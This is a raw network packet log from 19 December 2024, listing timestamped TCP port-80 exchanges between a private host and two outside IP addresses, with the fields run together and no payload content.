                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.265391111 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.265455961 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.265530109 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.265573978 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.266352892 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.266441107 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.266518116 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.266571045 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.267505884 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.267545938 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.267669916 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.267719984 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.268635988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.268687010 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.268760920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.268848896 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.269953966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.269988060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.270019054 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.270040035 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.270749092 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.270808935 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.270917892 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.271163940 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.271874905 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.271986008 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.272046089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.272150040 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.272865057 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.273050070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.273101091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.274168968 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.274204016 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.274229050 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.274245977 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.274985075 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.275021076 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.275051117 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.275090933 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.275748014 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.275798082 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.275873899 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.275929928 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.411398888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.411494017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.411509991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.411540985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.411904097 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.411990881 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.412051916 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.412117958 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.413012028 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.413078070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.413130999 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.413254023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.414027929 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.414268970 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.414391041 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.414434910 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.414503098 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.414549112 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.415474892 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.415524006 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.415597916 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.415647984 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.416568041 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.416620016 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.416676998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.416723013 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.417659998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.417706966 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.417743921 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.417901039 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.418782949 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.418859005 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.419076920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.419188023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.419838905 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.419909954 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.419924021 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.420078993 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.420944929 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.420998096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.421168089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.421205044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.422004938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.422061920 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.422154903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.422197104 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.423122883 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.423177004 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.423212051 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.423260927 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.424195051 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.424307108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.424308062 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.424349070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.425272942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.425334930 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.425373077 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.425419092 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.426373959 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.426486969 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.426538944 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.427449942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.427512884 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.427551031 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.427685022 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.428550959 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.428644896 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.428677082 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.428719044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.429639101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.429718018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.429749966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.429790020 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.430731058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.430773973 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.430840015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.430891991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.431821108 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.431871891 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.431924105 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.431967974 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.432898045 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.432941914 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.433021069 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.433068991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.434005976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.434063911 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.434103012 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.435095072 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.435151100 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.435199022 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.435250998 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.436188936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.436253071 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.436285973 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.436342001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.437261105 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.437314987 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.437352896 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.437411070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.438332081 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.438457012 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.438524008 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.439430952 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.439498901 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.439532995 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.439582109 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.440519094 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.440577984 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.440624952 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.440670013 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.441601992 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.441669941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.441700935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:44.441747904 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:46.853349924 CET4983280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:46.853601933 CET4985480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:46.973031998 CET8049854185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:46.973237038 CET8049832185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:46.973371983 CET4983280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:46.974139929 CET4985480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:47.080477953 CET4985480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:47.200046062 CET8049854185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.309860945 CET8049854185.215.113.43192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.309941053 CET4985480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.327603102 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.328171015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.447355032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.447427034 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.447621107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.447801113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.447982073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:48.567461014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.769938946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.769979954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770070076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770078897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770078897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770119905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770153999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770157099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770190954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770226955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770231009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770231009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770231009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770306110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770343065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770384073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770384073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770384073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770415068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.770512104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.890024900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.890077114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.890116930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.890258074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.894114017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.894198895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.894222975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.894283056 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.961894035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.961986065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.961997032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.962053061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.964365959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.964452028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.964463949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.964507103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.972738981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.972784042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.972909927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.972994089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.981086969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.981163979 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.981199026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.981235981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.989501953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.989609003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.989643097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.989644051 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.997868061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.997932911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.997973919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:49.998226881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.006356955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.006449938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.006469965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.006531954 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.014816046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.014878035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.014883041 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.014919043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.022967100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.023034096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.023085117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.023143053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.031416893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.031536102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.031717062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.031807899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.038645983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.038769007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.038784981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.038856030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.045895100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.045938015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.046006918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.046062946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.081564903 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.081620932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.153904915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.153959036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.153992891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.154043913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.156070948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.156137943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.156872034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.156929016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.157007933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.157166958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.161387920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.161438942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.161459923 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.161497116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.165759087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.165853024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.165874004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.166018963 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.170274973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.170362949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.170443058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.170496941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.174655914 CET804986031.41.244.11192.168.2.4
